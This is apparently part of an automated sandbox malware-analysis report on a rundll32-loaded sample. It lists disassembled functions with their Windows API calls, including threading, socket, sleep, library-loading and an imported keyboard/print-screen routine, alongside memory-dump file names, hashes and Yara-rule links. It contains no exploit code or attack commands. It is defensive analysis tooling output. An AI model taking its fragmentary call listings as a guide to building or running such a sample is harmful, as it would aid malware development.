__RTC_Initialize.LIBCMT ref: 6D048AD4

Part of subcall function 6D049CA7: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,00000000,00000001,6D048AD9,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001), ref: 6D049CC0

Part of subcall function 6D049B4F: InitializeSListHead.KERNEL32(6D08A898,6D048ADE,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001,?,6D086738), ref: 6D049B54

Part of subcall function 6D05C343: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,6D05C5ED,6D07036C,6D070370,6D086BC0,00000014,6D05C525,6D086BE0,00000008,6D05C6AD,?,?,6D05C80B,93BD9D6B), ref: 6D05C35A

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D048B3E
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000002,00000001,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001,?), ref: 6D048B54

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisablePrintScreen@@$Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 1081537013-0
Opcode ID: f9a267ee04ebe1f49988b135cb9e5340f79da4770604516c63d3faa26edfced4
Instruction ID: c0e74a8bf2554af5cb0b967af18d38e48ce23f0089a50a5594631054f31f4874
Opcode Fuzzy Hash: f9a267ee04ebe1f49988b135cb9e5340f79da4770604516c63d3faa26edfced4
Instruction Fuzzy Hash: 1C21C07254D306EEFF24ABA49604FAD37B19F0622DF21C979C6846B1C2DF221084C6E9

Function 6D05BF4E Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(?,?,Function_0006BDF2,00000000,?,?), ref: 6D05BF97
GetLastError.KERNEL32 ref: 6D05BFA3
__dosmaperr.LIBCMT ref: 6D05BFAA

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 1b98263f425567c1864eff3696e93ff93a74c0d01dc67d33c6973283b202d3de
Instruction ID: d8a0fd04c91bd24f71c417112a1191612b90cf6a33fe35eac260b847fe7fc9a4
Opcode Fuzzy Hash: 1b98263f425567c1864eff3696e93ff93a74c0d01dc67d33c6973283b202d3de
Instruction Fuzzy Hash: D801923651821AEFEF058FA2CE04BAE7BB5EF01364F004014FD0197150DB31E960DB90

Function 6D05BDF2 Relevance: 4.5, APIs: 3, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6D086B38,0000000C), ref: 6D05BE05
ExitThread.KERNEL32 ref: 6D05BE0C
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,6D086B38,0000000C), ref: 6D05BE42

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableErrorExitLastPrintScreen@@Thread
String ID:
API String ID: 2672339741-0
Opcode ID: d3495180f3c9b30692c9f98ee6f718c1dd8b8e52a80222bdb73480fc918d362b
Instruction ID: af43e054636ee2005083299382a164c53252d59a9f18b7973021c23cc8cb3195
Opcode Fuzzy Hash: d3495180f3c9b30692c9f98ee6f718c1dd8b8e52a80222bdb73480fc918d362b
Instruction Fuzzy Hash: EDF0C270908208AFEB049F70C508B2E3BB4EF46318F21415DEA059B291DB316920CFA2

Function 6D037350 Relevance: 4.5, APIs: 3, Instructions: 33networkCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 6D037367
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000000), ref: 6D037385
WSAGetLastError.WS2_32 ref: 6D03738F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID:
API String ID: 3033474312-0
Opcode ID: 0d69943f46ebcfef41dfafc8cc0512818983167a3e2e960cb81b0c57e90f805e
Instruction ID: 494296918cc64027c8b293e11625cc96abbcdee70e2f52387e790385b1571e71
Opcode Fuzzy Hash: 0d69943f46ebcfef41dfafc8cc0512818983167a3e2e960cb81b0c57e90f805e
Instruction Fuzzy Hash: FFF01D70648313EBFB54DF11C84576F7BF4AFC2701F218528EA94DA180D775D4098B52

Function 6D05BEA7 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D060D92: GetLastError.KERNEL32(00000000,00000000,6D051F9D,6D062DA2,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF), ref: 6D060D96
Part of subcall function 6D060D92: SetLastError.KERNEL32(00000000,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000,?,?), ref: 6D060E38

CloseHandle.KERNEL32(?,?,?,6D05BFDE,?,?,6D05BE50,00000000), ref: 6D05BED8
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6D05BFDE,?,?,6D05BE50,00000000), ref: 6D05BEEE

Part of subcall function 6D063608: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD ref: 6D06362C

ExitThread.KERNEL32 ref: 6D05BEF7

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorExitLastThread$CloseDisableFreeHandleLibraryPrintScreen@@
String ID:
API String ID: 4260017400-0
Opcode ID: 6a90805e38445b4a88b7ec8642e446500f3468598835769a2d2ea0e599490871
Instruction ID: 400d1a3edba98f763a2c19300aff42c9f2f6fb2b9d546c40745523f606b7e0e2
Opcode Fuzzy Hash: 6a90805e38445b4a88b7ec8642e446500f3468598835769a2d2ea0e599490871
Instruction Fuzzy Hash: 07F034304046566BEF115B368A08B3A3AF8AF02224F098714BE35D75A0DB31EC71C6A2

Function 6D063157 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(000000FA,?), ref: 6D063183

Strings

AppPolicyGetThreadInitializationType, xrefs: 6D06315D, 6D063167

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisablePrintScreen@@
String ID: AppPolicyGetThreadInitializationType
API String ID: 2435750010-3350320272
Opcode ID: 1889458463e3fe4f5eb488c1ed5e878ad476c1f3b72b34f93883a4703cede1f0
Instruction ID: cec9a14b7569558b633c1201eadb90673b8a5369160c63516618ddbd110d3094
Opcode Fuzzy Hash: 1889458463e3fe4f5eb488c1ed5e878ad476c1f3b72b34f93883a4703cede1f0
Instruction Fuzzy Hash: 19E0C23254423C73BA1017958C08FAB3E28DF4B7B0B054331BD2D2B2C2E561494282E6

Function 6D05EED9 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D04FC5B: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,00000000,?,?,?,6D04F93A,00000000,00000000,00000000,00000000,00000000,?), ref: 6D04FC91

Part of subcall function 6D05E5EF: GetConsoleOutputCP.KERNEL32(93BD9D6B,00000000,00000000,?), ref: 6D05E652

WriteFile.KERNEL32(?,6D0642E9,00000000,6D065E4B,00000000,6D0642E9,00000000,00000000,?,6D065E4B,00000000,00000000,6D065D88,6D0642E9,00000000,?), ref: 6D05F05E
GetLastError.KERNEL32(?,6D065E4B,00000000,00000000,6D065D88,6D0642E9,00000000,?,6D05A8FE,00000000,6D0642E9), ref: 6D05F068

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ConsoleDisableErrorFileLastOutputPrintScreen@@Write
String ID:
API String ID: 1227899511-0
Opcode ID: 73a2f239999a6c96a57e127467070556c2cca538786cfa69898ee01ff42345fa
Instruction ID: 4a3e0eb29826f43a9c011288b77bd407f369014768852e900d29771d7314af46
Opcode Fuzzy Hash: 73a2f239999a6c96a57e127467070556c2cca538786cfa69898ee01ff42345fa
Instruction Fuzzy Hash: 7E61A17580415AAFEF01CFA8CA44FAEBFB9BB0A308F154245ED50E7246D776D921CB60

Function 6D0372B0 Relevance: 3.1, APIs: 2, Instructions: 57networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,00000000), ref: 6D0372FC
socket.WS2_32(?,00000002,00000000), ref: 6D037319

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 9ff7d1d17c1b794a3a1a249c07a66084ca2f90c2917000f64082a1d2bac5772b
Instruction ID: 83592f5afae9cea2cec1a345c498c13d2e1f5334d21e0dce398431a7a6c42ae5
Opcode Fuzzy Hash: 9ff7d1d17c1b794a3a1a249c07a66084ca2f90c2917000f64082a1d2bac5772b
Instruction Fuzzy Hash: CA119435604213EFEB21CF65C840B4AB7F1FF8A321F104969F564972A0C371E851CB51

Function 6D010FD0 Relevance: 3.0, APIs: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000017,00000002,00000000), ref: 6D011014

Part of subcall function 6D010FD0: closesocket.WS2_32(00000000), ref: 6D01102E

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: closesocketsocket
String ID:
API String ID: 2760038618-0
Opcode ID: 42d6ec1fbe4664561908f9966bfef9b2906878ad2517ed61b5804b0a56fb1a0a
Instruction ID: 0ac71ed305306770c5abda4fb64e5b6356bcd1c9c2a00f521ad317292451cc2b
Opcode Fuzzy Hash: 42d6ec1fbe4664561908f9966bfef9b2906878ad2517ed61b5804b0a56fb1a0a
Instruction Fuzzy Hash: 81F0F633E0CAB24BE71186788949BCE37E05F02BA1F0A45A4E9497F1D2C3A09C458792

Function 04EC4598 Relevance: 3.0, APIs: 2, Instructions: 33sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04EC7B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
Part of subcall function 04EC7B90: socket.WS2_32 ref: 04EC7BC6

Sleep.KERNEL32(0000EA60,00000000), ref: 04EC45C5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 04EC45FE
_memset.LIBCMT ref: 04EC4629
_strncpy.LIBCMT ref: 04EC463F
GetTickCount.KERNEL32 ref: 04EC4664
GetTickCount.KERNEL32 ref: 04EC4675
setsockopt.WS2_32 ref: 04EC46B1
CancelIo.KERNEL32(?), ref: 04EC46BF
InterlockedExchange.KERNEL32(?,00000000), ref: 04EC46CF
closesocket.WS2_32(?), ref: 04EC46DD
SetEvent.KERNEL32(?), ref: 04EC46EB
Sleep.KERNEL32 ref: 04EC4707
Sleep.KERNEL32(00000BB8), ref: 04EC4721
CloseHandle.KERNEL32(?), ref: 04EC473A
GetTickCount.KERNEL32 ref: 04EC485C

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedReset_memset_strncpyclosesocketsetsockoptsocket
String ID:
API String ID: 1535685871-0
Opcode ID: 565df32670481cbd6e49b5cb77ee843566f71ceb2f9e88fb3ae759cd89c3a8b4
Instruction ID: 9176e78f362a3d3e3952a365b7a189ec87b25d4dde6dcb01de3a93adce45b229
Opcode Fuzzy Hash: 565df32670481cbd6e49b5cb77ee843566f71ceb2f9e88fb3ae759cd89c3a8b4
Instruction Fuzzy Hash: 2CF096316082418EE764DF55E9517E9B3F4FF85708F00145DE94A87180EB307906CB92

Function 6D05F802 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,6D06A41E,6D04EA46,00000000,6D04EA46,?,6D06A6BF,6D04EA46,00000007,6D04EA46,?,6D068357,6D04EA46,6D04EA46), ref: 6D05F818
GetLastError.KERNEL32(6D04EA46,?,6D06A41E,6D04EA46,00000000,6D04EA46,?,6D06A6BF,6D04EA46,00000007,6D04EA46,?,6D068357,6D04EA46,6D04EA46), ref: 6D05F823

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 769937ee211d73572489d3ab6a075fe9723038a657736061249ab4d216de2bbf
Instruction ID: 25f7c4802ee033e0d75188ce689445034be310f328f42cece5342f4729ad5cc3
Opcode Fuzzy Hash: 769937ee211d73572489d3ab6a075fe9723038a657736061249ab4d216de2bbf
Instruction Fuzzy Hash: 8CE08632508218ABDF011FA1DD08B6A3BB8EB02756F114460FA089B0A0DB398461CB90

Function 04EB8F08 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 04EB8F20

Part of subcall function 04EBB0B8: __mtinitlocknum.LIBCMT ref: 04EBB0CE
Part of subcall function 04EBB0B8: __amsg_exit.LIBCMT ref: 04EBB0DA
Part of subcall function 04EBB0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000,?,04EB3E44,00000000,04ECC518,00000008,04EB3EA9,?), ref: 04EBB0E2

__tzset_nolock.LIBCMT ref: 04EB8F31

Part of subcall function 04EB8827: __lock.LIBCMT ref: 04EB8849
Part of subcall function 04EB8827: ____lc_codepage_func.LIBCMT ref: 04EB8890
Part of subcall function 04EB8827: __getenv_helper_nolock.LIBCMT ref: 04EB88B2
Part of subcall function 04EB8827: _free.LIBCMT ref: 04EB88E9
Part of subcall function 04EB8827: _strlen.LIBCMT ref: 04EB88F0
Part of subcall function 04EB8827: __malloc_crt.LIBCMT ref: 04EB88F7
Part of subcall function 04EB8827: _strlen.LIBCMT ref: 04EB890D
Part of subcall function 04EB8827: _strcpy_s.LIBCMT ref: 04EB891B
Part of subcall function 04EB8827: __invoke_watson.LIBCMT ref: 04EB8930
Part of subcall function 04EB8827: _free.LIBCMT ref: 04EB893F

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: a8b66ca4c2130e10ed575355408ed1c874ee55d2bc5852eb7997c2241a12600a
Instruction ID: 63320322ddd0be77addd1a5a71a9e501d9edb2c01247b63d1d68011f07a57658
Opcode Fuzzy Hash: a8b66ca4c2130e10ed575355408ed1c874ee55d2bc5852eb7997c2241a12600a
Instruction Fuzzy Hash: FFE08C30480729E6EB32BFA1E9015CEB2A5FB44B6AFA0B296A4D411284CA343601CFD1

Function 6D060D92 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,6D051F9D,6D062DA2,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF), ref: 6D060D96
SetLastError.KERNEL32(00000000,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000,?,?), ref: 6D060E38

Part of subcall function 6D0632E5: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,6D04EA46,?,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000), ref: 6D06330F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$DisablePrintScreen@@
String ID:
API String ID: 1695489132-0
Opcode ID: 5e70313f9a769b8c280a7170aa0f4713a6fbe069feebe0da2f06399c9076d9bb
Instruction ID: 1865adb1176ba33091da317c46872f2f795a308d5cbe5c630b56750447a1d98e
Opcode Fuzzy Hash: 5e70313f9a769b8c280a7170aa0f4713a6fbe069feebe0da2f06399c9076d9bb
Instruction Fuzzy Hash: 5111E57169C2A2AEFB015BB69C84F6B3ABCEB0B7EDF550224F615930A1DB508D15C1B0

Function 04EC7F90 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241c2b07c6cdee40895c39adfae2dac11d68b88af2225cf85628e54cae2e4159
Instruction ID: 58f43349ff5c6f90ef6953d87b49c17c1d5ca3a7c95e717ab99da7aa3db84634
Opcode Fuzzy Hash: 241c2b07c6cdee40895c39adfae2dac11d68b88af2225cf85628e54cae2e4159
Instruction Fuzzy Hash: D711C2733046425E9724DA7EEA8486BB7DADFD0265700883EE56AC3600FE30F4028AA0

Function 6D06432D Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 6D0642E4

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a04d827a40ee0ca4d3a42c6c3a369fa2d608df717d1916e85461e9c55eda88bb
Instruction ID: dc31171bd152155aa2c1aeeb3e12515d89c7b656312b3eb6edbe27f33b729a53
Opcode Fuzzy Hash: a04d827a40ee0ca4d3a42c6c3a369fa2d608df717d1916e85461e9c55eda88bb
Instruction Fuzzy Hash: B2113A71A0824AAFDF05CF58E941E9F7BF8EF49314F154059F808EB241D671EA11CBA5

Function 6D063092 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc28820d09ff4e456fcc1891384118c2664e2960cbbae8c92fdf4e75a75e1046
Instruction ID: f96b63c4eae53da889ed5d6626972a9f6bd6a65c67b13abce6d3465de7957afb
Opcode Fuzzy Hash: dc28820d09ff4e456fcc1891384118c2664e2960cbbae8c92fdf4e75a75e1046
Instruction Fuzzy Hash: C80180372142569BBF168F69EC51B9A33BAFBCB2207294124FA11AB184DB31940587A0

Function 04EFE14D Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,04EFE0C7,?,?,?,?,?), ref: 04EFE160

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EFE000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4efe000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction ID: 66d16d330c33771257b4b4d64ffe585a9cb172076f5ebad54ce4803f3f32eb7e
Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction Fuzzy Hash: EFF0F4727043168FEB108E5ECC405B777E8AF8166970A1628EA46D7221F321F80183A0

Function 6D0645BE Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D05F83C: HeapAlloc.KERNEL32(00000000,6D06717F,?,?,6D06717F,00000220,?,?,?), ref: 6D05F86E

RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 6D06461B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Heap$AllocAllocate
String ID:
API String ID: 2177240990-0
Opcode ID: af69c94a9acc40e4bbd06cd14d0b7be20b82dd9fb0624d7c1da3493a01baba89
Instruction ID: d4a565eb440f0b9d576b61087b9f5a07d5969f4157373494c1fb748c5f2b136e
Opcode Fuzzy Hash: af69c94a9acc40e4bbd06cd14d0b7be20b82dd9fb0624d7c1da3493a01baba89
Instruction Fuzzy Hash: 47F0C83255C19676FB122A2A9C10B6F3BACAF87770B114025E91497192FF20C5108972

Function 6D037240 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

